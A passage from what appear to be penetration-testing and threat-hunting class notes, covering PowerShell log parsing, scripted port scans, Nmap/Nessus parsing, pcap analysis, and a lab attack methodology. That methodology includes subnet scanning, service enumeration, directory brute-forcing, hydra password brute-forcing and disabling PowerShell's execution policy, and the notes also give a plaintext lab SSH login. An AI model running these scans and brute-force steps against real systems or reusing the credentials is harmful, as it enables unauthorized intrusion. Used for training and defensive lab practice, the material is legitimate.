1976. To obtain this information, pipe the contents of the security log to a Where-Object to filter the events, and then send the results to the Measure-Object cmdlet to determine the number of events:
1977. ------------------------Type This------------------------------
1978. $seclog | ? { $_.message -match 'SeSecurityPrivilege'} | measure
1979. ---------------------------------------------------------------
1980. If you want to ensure that only event log entries return that contain SeSecurityPrivilege in their text, use Group-Object to gather the matches by the EventID property.
1981.  
1982. ------------------------Type This------------------------------
1983. $seclog | ? { $_.message -match 'SeSecurityPrivilege'} | group eventid
1984. ---------------------------------------------------------------
1985.  
1986. Because importing the event log into a variable from the stored XML results in a collection of event log entries, it means that the count property is also present.
1987. Use the count property to determine the total number of entries in the event log.
1988. ------------------------Type This------------------------------
1989. $seclog.Count
1990. ---------------------------------------------------------------
1991.  
1992.  
1993.  
1994.  
1995.  
1996. ############################
1997. # Simple Log File Analysis #
1998. ############################
1999.  
2000.  
2001. You'll need to create the directory c:\ps and download sample iss log http://pastebin.com/raw.php?i=LBn64cyA
2002.  
2003. ------------------------Type This------------------------------
2004. cd c:\ps
2005. (new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
2006. (new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=ysnhXxTV", "c:\ps\CiscoLogFileExamples.txt")
2007. Select-String 192.168.208.63 .\CiscoLogFileExamples.txt
2008. ---------------------------------------------------------------
2009.  
2010.  
2011.  
2012. The Select-String cmdlet searches for text and text patterns in input strings and files. You can use it like Grep in UNIX and Findstr in Windows.
2013. ------------------------Type This------------------------------
2014. Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line
2015. ---------------------------------------------------------------
2016.  
2017.  
2018.  
2019. To see how many connections are made when analyzing a single host, the output from that can be piped to another command: Measure-Object.
2020. ------------------------Type This------------------------------
2021. Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line | Measure-Object
2022. ---------------------------------------------------------------
2023.  
2024.  
2025. To select all IP addresses in the file expand the matches property, select the value, get unique values and measure the output.
2026. ------------------------Type This------------------------------
2027. Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique | Measure-Object
2028. ---------------------------------------------------------------
2029.  
2030.  
2031. Removing Measure-Object shows all the individual IPs instead of just the count of the IP addresses. The Measure-Object command counts the IP addresses.
2032. ------------------------Type This------------------------------
2033. Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique
2034. ---------------------------------------------------------------
2035.  
2036. In order to determine which IP addresses have the most communication the last commands are removed to determine the value of the matches. Then the group command is issued on the piped output to group all the IP addresses (value), and then sort the objects by using the alias for Sort-Object: sort count –des.
2037. This sorts the IP addresses in a descending pattern as well as count and deliver the output to the shell.
2038. ------------------------Type This------------------------------
2039. Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select value | group value | sort count -des
2040. ---------------------------------------------------------------
2041.  
2042.  
2043.  
2044. ##############################################
2045. # Parsing Log files using windows PowerShell #
2046. ##############################################
2047.  
2048. Download the sample IIS log http://pastebin.com/LBn64cyA
2049.  
2050. ------------------------Type This------------------------------
2051. (new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
2052.  
2053. Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV")}
2054. ---------------------------------------------------------------
2055.  
2056.  
2057. The above command would give us all the WebDAV requests.
2058.  
2059. To filter this to a particular user name, use the below command:
2060. ------------------------Type This------------------------------
2061. Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV") -and ($_ | Select-String "OPTIONS")}
2062. ---------------------------------------------------------------
2063.  
2064.  
2065. Some more options that will be more commonly required :
2066.  
2067. For Outlook Web Access : Replace WebDAV with OWA
2068.  
2069. For EAS : Replace WebDAV with Microsoft-server-activesync
2070.  
2071. For ECP : Replace WebDAV with ECP
2072.  
2073.  
2074.  
2075.  
2076.  
2077.  
2078.  
2079. ####################################################################
2080. # Windows PowerShell: Extracting Strings Using Regular Expressions #
2081. ####################################################################
2082.  
2083.  
2084. Regex Characters you might run into:
2085.  
2086. ^ Start of string, or start of line in a multiline pattern
2087. $ End of string, or start of line in a multiline pattern
2088. \b Word boundary
2089. \d Digit
2090. \ Escape the following character
2091. * 0 or more {3} Exactly 3
2092. + 1 or more {3,} 3 or more
2093. ? 0 or 1 {3,5} 3, 4 or 5
2094.  
2095.  
2096.  
2097. To build a script that will extract data from a text file and place the extracted text into another file, we need three main elements:
2098.  
2099. 1) The input file that will be parsed
2100. ------------------------Type This------------------------------
2101. (new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=rDN3CMLc", "c:\ps\emails.txt")
2102. (new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=XySD8Mi2", "c:\ps\ip_addresses.txt")
2103. (new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=v5Yq66sH", "c:\ps\URL_addresses.txt")
2104. ---------------------------------------------------------------
2105. 2) The regular expression that the input file will be compared against
2106.  
2107. 3) The output file for where the extracted data will be placed.
2108.  
2109. Windows PowerShell has a "select-string" cmdlet which can be used to quickly scan a file to see if a certain string value exists.
2110. Using some of the parameters of this cmdlet, we are able to search through a file to see whether any strings match a certain pattern, and then output the results to a separate file.
2111.  
2112. To demonstrate this concept, below is a Windows PowerShell script I created to search through a text file for strings that match the Regular Expression (or RegEx for short) pattern belonging to e-mail addresses.
2113. ------------------------Type This------------------------------
2114. $input_path = 'c:\ps\emails.txt'
2115. $output_file = 'c:\ps\extracted_addresses.txt'
2116. $regex = '\b[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}\b'
2117. select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
2118. ---------------------------------------------------------------
2119.  
2120.  
2121. In this script, we have the following variables:
2122.  
2123. 1) $input_path to hold the path to the input file we want to parse
2124.  
2125. 2) $output_file to hold the path to the file we want the results to be stored in
2126.  
2127. 3) $regex to hold the regular expression pattern to be used when the strings are being matched.
2128.  
2129. The select-string cmdlet contains various parameters as follows:
2130.  
2131. 1) "-Path" which takes as input the full path to the input file
2132.  
2133. 2) "-Pattern" which takes as input the regular expression used in the matching process
2134.  
2135. 3) "-AllMatches" which searches for more than one match (without this parameter it would stop after the first match is found) and is piped to "$.Matches" and then "$_.Value" which represent using the current values of all the matches.
2136.  
2137. Using ">" the results are written to the destination specified in the $output_file variable.
2138.  
2139. Here are two further examples of this script which incorporate a regular expression for extracting IP addresses and URLs.
2140.  
2141. IP addresses
2142. ------------
2143. For the purposes of this example, I ran the tracert command to trace the route from my host to google.com and saved the results into a file called ip_addresses.txt. You may choose to use this script for extracting IP addresses from router logs, firewall logs, debug logs, etc.
2144. ------------------------Type This------------------------------
2145. $input_path = 'c:\ps\ip_addresses.txt'
2146. $output_file = 'c:\ps\extracted_ip_addresses.txt'
2147. $regex = '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'
2148. select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
2149. ---------------------------------------------------------------
2150.  
2151.  
2152.  
2153. URLs
2154. ----
2155. For the purposes of this example, I created a couple of dummy web server log entries and saved them into URL_addresses.txt.
2156. You may choose to use this script for extracting URL addresses from proxy logs, network packet capture logs, debug logs, etc.
2157. ------------------------Type This------------------------------
2158. $input_path = 'c:\ps\URL_addresses.txt'
2159. $output_file = 'c:\ps\extracted_URL_addresses.txt'
2160. $regex = '([a-zA-Z]{3,})://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
2161. select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
2162. ---------------------------------------------------------------
2163.  
2164. In addition to the examples above, many other types of strings can be extracted using this script.
2165. All you need to do is switch the regular expression in the "$regex" variable!
2166. In fact, the beauty of such a PowerShell script is its simplicity and speed of execution.
2167.  
2168.  
2169.  
2170.  
2171.  
2172.  
2173. ########################################
2174. # Basic Network Commands in PowerShell #
2175. ########################################
2176.  
2177. Reference:
2178. https://blogs.technet.microsoft.com/josebda/2015/04/18/windows-powershell-equivalents-for-common-networking-commands-ipconfig-ping-nslookup/
2179.  
2180.  
2181. ###################
2182. # Pentester Tasks #
2183. ###################
2184. Reference:
2185. http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/02/use-powershell-for-network-host-and-port-discovery-sweeps.aspx
2186.  
2187.  
2188. Listing IPs
2189. -----------
2190. One of the typical ways for working with IP addressed in most scripts is to work with an octet and then increase the last one
2191.  
2192. ------------------------Type This------------------------------
2193. $octect = "149.28.201."
2194. $lastoctect = (1..255)
2195. $lastoctect | ForEach-Object {write-host "$($octect)$($_)"}
2196. ---------------------------------------------------------------
2197.  
2198.  
2199. Ping Sweep
2200. ------------------------------------------------------
2201. PowerShell provides several methods for doing Ping
2202. Test-Connection cmdlet
2203. Creation of a WMI Object
2204. .Net System.Net.NetworkInformation.Ping Object
2205. ------------------------------------------------------
2206.  
2207.  
2208.  
2209. Port Scans
2210. ----------
2211. To test if a port is open on a remote host in PowerShell the best method is to use the .Net abstraction that it provides to Windows Socket library
2212. For TCP the .Net System.Net.Sockets.TcpClient
2213. For UDP the .Net System.Net.Sockets.UdpClient
2214.  
2215.  
2216.  
2217.  
2218. TCP Scan (Windows 7)
2219. --------------------
2220. NOTE: If you are using Windows 7, use the code below
2221. ------------------------Type This------------------------------
2222. $ports=22,80,443,3389
2223. $target = "149.28.201.171"
2224. foreach ($i in $ports) {
2225. try {
2226. $socket = new-object System.Net.Sockets.TCPClient($target, $i);
2227. } catch {}
2228. if ($socket -eq $NULL) {
2229. echo "$target:$i - Closed";
2230. } else {
2231. echo "$target:$i - Open";
2232. $socket = $NULL;
2233. }}
2234. ---------------------------------------------------------------
2235.  
2236.  
2237.  
2238. TCP Scan (Windows 10)
2239. ---------------------
2240. NOTE: If you are using Windows 10, use the code below
2241.  
2242. ------------------------Type This------------------------------
2243. $ports=22,80,443,3389
2244. $target = "149.28.201.171"
2245. foreach ($i in $ports) {
2246. try {
2247. $socket = new-object System.Net.Sockets.TCPClient($target, $i);
2248. } catch {}
2249. if ($socket -eq $NULL) {
2250. echo "${target}:$i - Closed";
2251. } else {
2252. echo "${target}:$i - Open";
2253. $socket = $NULL;
2254. }}
2255. ---------------------------------------------------------------
2256.  
2257.  
2258.  
2259. ##########################
2260. # Parsing Nmap XML Files #
2261. ##########################
2262. If you are NOT using the Win7 VM provided then you can get the required files for this lab which are located in this zip file:
2263. https://infosecaddicts-files.s3.amazonaws.com/PowerShell-Files.zip
2264.  
2265.  
2266. Let's setup a directory to work in:
2267. ------------------------Type This------------------------------
2268. cd c:\
2269.  
2270. mkdir ps
2271.  
2272. cd ps
2273. ---------------------------------------------------------------
2274.  
2275.  
2276.  
2277.  
2278. ------------------------Type This------------------------------
2279. cd c:\ps
2280. mkdir PowerShell-Files
2281. cd PowerShell-Files
2282. (new-object System.Net.WebClient).DownloadFile("https://infosecaddicts-files.s3.amazonaws.com/Parse-Nmap.ps1", "c:\ps\PowerShell-Files\Parse-Nmap.ps1")
2283. (new-object System.Net.WebClient).DownloadFile("https://infosecaddicts-files.s3.amazonaws.com/class_nessus.csv", "c:\ps\PowerShell-Files\class_nessus.csv")
2284. (new-object System.Net.WebClient).DownloadFile("https://infosecaddicts-files.s3.amazonaws.com/samplescan.xml", "c:\ps\PowerShell-Files\samplescan.xml")
2285. ---------------------------------------------------------------
2286.  
2287.  
2288. Run Powershell as administrator
2289. ------------------------Type This------------------------------
2290. cd C:\ps\\PowerShell-Files
2291.  
2292. Get-ExecutionPolicy
2293. Set-ExecutionPolicy Unrestricted –Force
2294. ---------------------------------------------------------------
2295.  
2296.  
2297. Parse nmap XML
2298. ------------------------Type This------------------------------
2299. .\parse-nmap.ps1 samplescan.xml
2300. ---------------------------------------------------------------
2301.  
2302.  
2303. Process all XML files
2304. ------------------------Type This------------------------------
2305. .\parse-nmap.ps1 *.xml
2306. ---------------------------------------------------------------
2307.  
2308. Piping also works
2309. ------------------------Type This------------------------------
2310. dir *.xml | .\parse-nmap.ps1
2311. ---------------------------------------------------------------
2312.  
2313. Advanced parsing with filtering conditions
2314. ------------------------Type This------------------------------
2315. .\parse-nmap.ps1 samplescan.xml | where {$_.OS -like "*Windows XP*"} | format-table IPv4,HostName,OS
2316. ---------------------------------------------------------------
2317.  
2318.  
2319. More parsing
2320. ------------------------Type This------------------------------
2321. .\parse-nmap.ps1 samplescan.xml | where {$_.Ports -like "*open:tcp:22*"}
2322. ---------------------------------------------------------------
2323.  
2324. Parsing with match and multiple conditions
2325. ------------------------Type This------------------------------
2326. .\parse-nmap.ps1 samplescan.xml |where {$_.Ports -match "open:tcp:80|open:tcp:443"}
2327. ---------------------------------------------------------------
2328.  
2329.  
2330. CSV Export
2331. ------------------------Type This------------------------------
2332. .\parse-nmap.ps1 samplescan.xml -outputdelimiter " " | where {$_.Ports -match "open:tcp:80"} | export-csv weblisteners.csv
2333. ---------------------------------------------------------------
2334.  
2335. Import Data from CSV
2336. ------------------------Type This------------------------------
2337. $data = import-csv weblisteners.csv
2338. $data | where {($_.IPv4 -like "10.57.*") -and ($_.Ports -match "open:tcp:22")}
2339. ---------------------------------------------------------------
2340.  
2341.  
2342. Export to HTML
2343. ------------------------Type This------------------------------
2344. .\parse-nmap.ps1 samplescan.xml -outputdelimiter " " |select-object IPv4,HostName,OS | ConvertTo-Html | out-file report.html
2345. ---------------------------------------------------------------
2346.  
2347.  
2348. ########################################
2349. # Parsing Nessus scans with PowerShell #
2350. ########################################
2351. If you are NOT using the Win7 VM provided then you can get the required files for this lab which are located in this zip file:
2352. https://infosecaddicts-files.s3.amazonaws.com/PowerShell-Files.zip
2353.  
2354.  
2355.  
2356. Let's take a look at the Import-Csv cmdlet and what are the members of the object it returns:
2357. ------------------------Type This------------------------------
2358. Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | Get-Member
2359. ---------------------------------------------------------------
2360.  
2361. filter the objects:
2362.  
2363. ------------------------Type This------------------------------
2364. Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | where {$_.risk -eq "high"}
2365. ---------------------------------------------------------------
2366.  
2367. use the Select-Object cmdlet and only get unique entries:
2368. ------------------------Type This------------------------------
2369. Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | where {$_.risk -eq "high"} | select host -Unique
2370.  
2371. Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | where {"high","medium","low" -contains $_.risk} | select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name | Out-GridView
2372. ------------------------Type This------------------------------
2373.  
2374. ConvertTo-Html cmdlet and turn it in to an HTML report in list format:
2375. ------------------------Type This------------------------------
2376. Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | where {"high","medium","low" -contains $_.risk} | select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name | ConvertTo-Html -As List > C:\report2.html
2377. ---------------------------------------------------------------
2378.  
2379.  
2380.  
2381.  
2382.  
2383.  
2384.  
2385.  
2386.  
2387.  
2388. ###################################
2389. ####################### Introduction to Threat Hunting ################################
2390. ###################################
2391.  
2392.  
2393.  
2394. ##################################################################
2395. # Analyzing a PCAP Prads #
2396. # Note: run as regular user #
2397. ##################################################################
2398.  
2399. ---------------------------Type this as a regular user----------------------------------
2400. cd ~/yourname
2401.  
2402. mkdir pcap_analysis/
2403.  
2404. cd pcap_analysis/
2405.  
2406. mkdir prads
2407.  
2408. cd prads
2409.  
2410. wget http://45.63.104.73/suspicious-time.pcap
2411.  
2412. prads -r suspicious-time.pcap -l prads-asset.log
2413.  
2414. cat prads-asset.log | less
2415.  
2416. cat prads-asset.log | grep SYN | grep -iE 'windows|linux'
2417.  
2418. cat prads-asset.log | grep CLIENT | grep -iE 'safari|firefox|opera|chrome'
2419.  
2420. cat prads-asset.log | grep SERVER | grep -iE 'apache|linux|ubuntu|nginx|iis'
2421. -----------------------------------------------------------------------
2422.  
2423.  
2424.  
2425.  
2426. ##################################
2427. # PCAP Analysis with ChaosReader #
2428. # Note: run as regular user #
2429. ##################################
2430. ---------------------------Type this as a regular user----------------------------------
2431. cd ~/yourname
2432.  
2433.  
2434. cd pcap_analysis/
2435.  
2436. mkdir chaos_reader/
2437.  
2438. cd chaos_reader/
2439.  
2440. wget http://45.63.104.73/suspicious-time.pcap
2441.  
2442. wget http://45.63.104.73/chaosreader.pl
2443.  
2444. perl chaosreader.pl suspicious-time.pcap
2445.  
2446. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
2447.  
2448. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
2449.  
2450.  
2451. for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
2452.  
2453. python -m SimpleHTTPServer
2454. ****** Open a web browser and browse the the IP address of your Linux machine port 8000 for the web page *****
2455.  
2456. ------------------------------------------------------------------------
2457.  
2458.  
2459.  
2460.  
2461.  
2462.  
2463.  
2464.  
2465. #############################
2466. # PCAP Analysis with tshark #
2467. # Note: run as regular user #
2468. #############################
2469. ---------------------------Type this as a regular user---------------------------------
2470. cd ~/yourname
2471.  
2472. mkdir pcap_analysis/
2473.  
2474. cd pcap_analysis/
2475.  
2476. mkdir tshark
2477.  
2478. cd tshark
2479.  
2480. wget http://45.63.104.73/suspicious-time.pcap
2481.  
2482. tshark -i ens3 -r suspicious-time.pcap -qz io,phs
2483.  
2484. tshark -r suspicious-time.pcap -qz ip_hosts,tree
2485.  
2486. tshark -r suspicious-time.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
2487.  
2488. tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
2489.  
2490.  
2491. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
2492.  
2493. whois rapidshare.com.eyu32.ru
2494.  
2495. whois sploitme.com.cn
2496.  
2497. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
2498.  
2499. tshark -r suspicious-time.pcap -qz http_req,tree
2500.  
2501. tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
2502.  
2503. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
2504. ------------------------------------------------------------------------
2505.  
2506.  
2507.  
2508.  
2509.  
2510.  
2511.  
2512.  
2513.  
2514.  
2515.  
2516.  
2517.  
2518.  
2519. Here is the information to put into putty
2520.  
2521. Host Name: 108.61.216.188
2522. protocol: ssh
2523. port: 22
2524. username: hacklab
2525. password: hacklab!cybersecurity!
2526.  
2527.  
2528.  
2529.  
2530.  
2531.  
2532.  
2533. -----------------------------------------------------------------------------------------------------------------------------
2534. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2535. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2536. --------------------------------------------------------------------------------------
2537.  
2538.  
2539.  
2540.  
2541. Some tools to install:
2542. ---------------------------Type This-----------------------------------
2543. apt install -y libcurl4-openssl-dev zlib1g-dev libssl-dev libidn11-dev libcurses-ocaml-dev libpcre3-dev libpq-dev libsvn-dev libssh-dev libmysqlclient-dev libpq-dev libsvn-dev onesixtyone snmp onesixtyone snmp nmap smbclient libnss-winbind winbind
2544. -----------------------------------------------------------------------
2545.  
2546.  
2547.  
2548. ---------------------------Type This-----------------------------------
2549. wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
2550. gcc propecia.c -o propecia
2551. sudo cp propecia /bin
2552. -----------------------------------------------------------------------
2553.  
2554.  
2555.  
2556.  
2557. ##############################
2558. # Scanning Process to follow #
2559. ##############################
2560.  
2561. Step 1: Host Discovery
2562. ----------------------
2563.  
2564. ---------------------------Type This-----------------------------------
2565. nmap -sP 172.31.2.0/24
2566.  
2567. nmap -sL 172.31.2.0/24
2568.  
2569. nmap -sS --open -p 22,445 172.31.2.0/24
2570.  
2571. propecia 172.31.2 22 > file1
2572. propecia 172.31.2 445 > file2
2573. cat file1 file2 > file3
2574. cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
2575. cat lab.txt
2576. -----------------------------------------------------------------------
2577.  
2578.  
2579. Step 2: Port Scan
2580. -----------------
2581. nmap -sS <IP-ADDRESS>
2582. nmap -sU -p 69,161 <IP-ADDRESS>
2583.  
2584.  
2585. ---------------------------Type This-----------------------------------
2586. sudo nmap -sS 172.31.2.0/24
2587. sudo nmap -sU -p 69,161 172.31.2.0/24
2588. -----------------------------------------------------------------------
2589.  
2590.  
2591. Step 3: Bannergrab
2592. ------------------
2593. nmap -sV <IP-ADDRESS>
2594. nmap -sV -p- <IP-ADDRESS>
2595. |
2596. ----> Vulnerability Research
2597.  
2598. ---------------------------Type This-----------------------------------
2599. sudo nmap -sV 172.31.2.0/24
2600. -----------------------------------------------------------------------
2601.  
2602.  
2603.  
2604.  
2605. Step 4: Enumerate common Windows/Linux file sharing services
2606. Step 3 is where most people STOP, and you need to move on and look deeper
2607. ------------------------------------------------------------
2608.  
2609. ---------------------------Type This-----------------------------------
2610. sudo apt install smbclient libnss-winbind winbind
2611. git clone https://github.com/portcullislabs/enum4linux.git
2612. cd enum4linux/
2613. perl enum4linux.pl -U 172.31.2.11
2614.  
2615. nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 172.31.2.24
2616. ---------------------------------------------------------------------------------------
2617.  
2618.  
2619.  
2620. Step 5: Vulnerability Scan the webservers
2621. -----------------------------------------
2622. git clone https://github.com/sullo/nikto.git Nikto2
2623.  
2624. cd Nikto2/program
2625.  
2626. perl nikto.pl -h <IP-ADDRESS>
2627.  
2628.  
2629.  
2630. Step 6: Directory Bruteforce every webserver
2631. --------------------------------------------
2632. sudo apt install -y libcurl4-openssl-dev
2633.  
2634. git clone https://github.com/v0re/dirb.git
2635.  
2636. cd dirb/
2637.  
2638. ./configure
2639.  
2640. make
2641.  
2642. ./dirb
2643.  
2644. ./dirb http://<IP-ADDRESS> wordlists/big.txt
2645.  
2646.  
2647.  
2648.  
2649.  
2650. Step 7: Analyze source code of all webpages found
2651. -------------------------------------------------
2652. lynx -dump "http://<IP-ADDRESS>" | grep -o "http:.*" > links
2653.  
2654. If you ever need to download an entire Web site, perhaps for off-line viewing, wget can do the job—for example:
2655.  
2656. $ wget \
2657. --recursive \
2658. --no-clobber \
2659. --page-requisites \
2660. --html-extension \
2661. --convert-links \
2662. --restrict-file-names=windows \
2663. --domains website.org \
2664. --no-parent \
2665. www.website.org/tutorials/html/
2666.  
2667.  
2668. This command downloads the Web site www.website.org/tutorials/html/.
2669.  
2670. The options are:
2671.  
2672. --recursive: download the entire Web site.
2673.  
2674. --domains website.org: don't follow links outside website.org.
2675.  
2676. --no-parent: don't follow links outside the directory tutorials/html/.
2677.  
2678. --page-requisites: get all the elements that compose the page (images, CSS and so on).
2679.  
2680. --html-extension: save files with the .html extension.
2681.  
2682. --convert-links: convert links so that they work locally, off-line.
2683.  
2684. --restrict-file-names=windows: modify filenames so that they will work in Windows as well.
2685.  
2686. --no-clobber: don't overwrite any existing files (used in case the download is interrupted and resumed).
2687.  
2688.  
2689.  
2690. Step 8: Bruteforce any services you find
2691. ----------------------------------------
2692. sudo apt install -y zlib1g-dev libssl-dev libidn11-dev libcurses-ocaml-dev libpcre3-dev libpq-dev libsvn-dev libssh-dev libmysqlclient-dev libpq-dev libsvn-dev
2693. cd ~/toolz
2694. git clone https://github.com/vanhauser-thc/thc-hydra.git
2695. cd thc-hydra
2696. ./configure
2697. make
2698. sudo make install
2699. hydra -L username.txt -P passlist.txt ftp://<IP-ADDRESS
2700. hydra -l user -P passlist.txt ftp://<IP-ADDRESS
2701.  
2702.  
2703.  
2704. ##################
2705. # Host Discovery #
2706. ##################
2707.  
2708. Reason:
2709. -------
2710. You have to discover the reachable hosts in the network before you can attack them.
2711.  
2712.  
2713. Hosts discovery syntax:
2714. -----------------------
2715. nmap -sP 172.31.2.0/24
2716. propecia 172.31.2 22 > file1
2717. propecia 172.31.2 445 > file2
2718. cat file1 file2 > file3
2719. cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
2720. cat lab.txt
2721.  
2722. Issues:
2723. -------
2724. Issue we had to deal with was hosts that didn't respond to ICMP
2725.  
2726.  
2727. Hosts discovered:
2728. -----------------
2729. 172.31.2.24
2730. 172.31.2.47
2731. 172.31.2.117
2732. 172.31.2.181
2733. 172.31.2.217
2734. 172.31.2.238
2735. 172.31.2.254
2736.  
2737.  
2738.  
2739.  
2740.  
2741.  
2742.  
2743. #####################
2744. # Service Discovery #
2745. #####################
2746.  
2747. Reason:
2748. -------
2749. Identifying what services are running on what hosts allows for you to map the network topology.
2750.  
2751.  
2752.  
2753. Port Scan syntax:
2754. sudo nmap -sS -Pn -iL lab.txt
2755. sudo nmap -sU -p69,161 -Pn -iL lab.txt
2756.  
2757.  
2758.  
2759. Services discovered:
2760. --------------------
2761.  
2762. joe@metasploit-box:~$ sudo nmap -sS -Pn -iL lab.txt
2763.  
2764. Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:52 UTC
2765. Nmap scan report for 172.31.2.11
2766. Host is up (0.087s latency).
2767. Not shown: 995 filtered ports
2768. PORT STATE SERVICE
2769. 21/tcp open ftp
2770. 139/tcp open netbios-ssn
2771. 445/tcp open microsoft-ds
2772. 3389/tcp open ms-wbt-server
2773. 9999/tcp open abyss
2774.  
2775. Nmap scan report for 172.31.2.11
2776. Host is up.
2777.  
2778. PORT STATE SERVICE
2779. 69/udp open|filtered tftp
2780. 161/udp open|filtered snmp
2781.  
2782.  
2783. Nmap scan report for 172.31.2.14
2784. Host is up (0.087s latency).
2785. Not shown: 995 filtered ports
2786. PORT STATE SERVICE
2787. 21/tcp open ftp
2788. 139/tcp open netbios-ssn
2789. 445/tcp open microsoft-ds
2790. 3389/tcp open ms-wbt-server
2791. 9999/tcp open abyss
2792.  
2793.  
2794. Nmap scan report for 172.31.2.14
2795. Host is up.
2796.  
2797. PORT STATE SERVICE
2798. 69/udp open|filtered tftp
2799. 161/udp open|filtered snmp
2800.  
2801.  
2802. Nmap scan report for 172.31.2.47
2803. Host is up (0.086s latency).
2804. Not shown: 998 closed ports
2805. PORT STATE SERVICE
2806. 22/tcp open ssh
2807. 80/tcp open http
2808.  
2809. Nmap scan report for 172.31.2.64
2810. Host is up (0.087s latency).
2811. Not shown: 997 closed ports
2812. PORT STATE SERVICE
2813. 22/tcp open ssh
2814. 80/tcp open http
2815. 6667/tcp open irc
2816.  
2817. Nmap scan report for 172.31.2.86
2818. Host is up (0.086s latency).
2819. Not shown: 989 closed ports
2820. PORT STATE SERVICE
2821. 22/tcp open ssh
2822. 53/tcp open domain
2823. 80/tcp open http
2824. 110/tcp open pop3
2825. 111/tcp open rpcbind
2826. 139/tcp open netbios-ssn
2827. 143/tcp open imap
2828. 445/tcp open microsoft-ds
2829. 993/tcp open imaps
2830. 995/tcp open pop3s
2831. 8080/tcp open http-proxy
2832.  
2833. Nmap scan report for 172.31.2.117
2834. Host is up (0.087s latency).
2835. Not shown: 997 closed ports
2836. PORT STATE SERVICE
2837. 22/tcp open ssh
2838. 80/tcp open http
2839. 2020/tcp open xinupageserver
2840.  
2841. Nmap scan report for 172.31.2.157
2842. Host is up (0.087s latency).
2843. Not shown: 997 closed ports
2844. PORT STATE SERVICE
2845. 21/tcp open ftp
2846. 22/tcp open ssh
2847. 80/tcp open http
2848.  
2849. Nmap scan report for 172.31.2.217
2850. Host is up (0.087s latency).
2851. Not shown: 997 closed ports
2852. PORT STATE SERVICE
2853. 22/tcp open ssh
2854. 80/tcp open http
2855. 3260/tcp open iscsi
2856.  
2857. Nmap scan report for 172.31.2.238
2858. Host is up (0.087s latency).
2859. Not shown: 997 closed ports
2860. PORT STATE SERVICE
2861. 22/tcp open ssh
2862. 80/tcp open http
2863. 6969/tcp open acmsoda
2864.  
2865. Nmap done: 9 IP addresses (9 hosts up) scanned in 14.82 seconds
2866.  
2867.  
2868.  
2869.  
2870.  
2871.  
2872.  
2873.  
2874.  
2875. ##############################################
2876. # Service Version Discovery (Bannergrabbing) #
2877. ##############################################
2878. Reason:
2879. -------
2880. Identifying what versions of services are running on what hosts allows for you to determine if the hosts are vulnerable to attack.
2881.  
2882.  
2883.  
2884. Port Scan syntax:
2885.  
2886. joe@metasploit-box:~$ sudo nmap -sV -Pn -iL lab.txt
2887.  
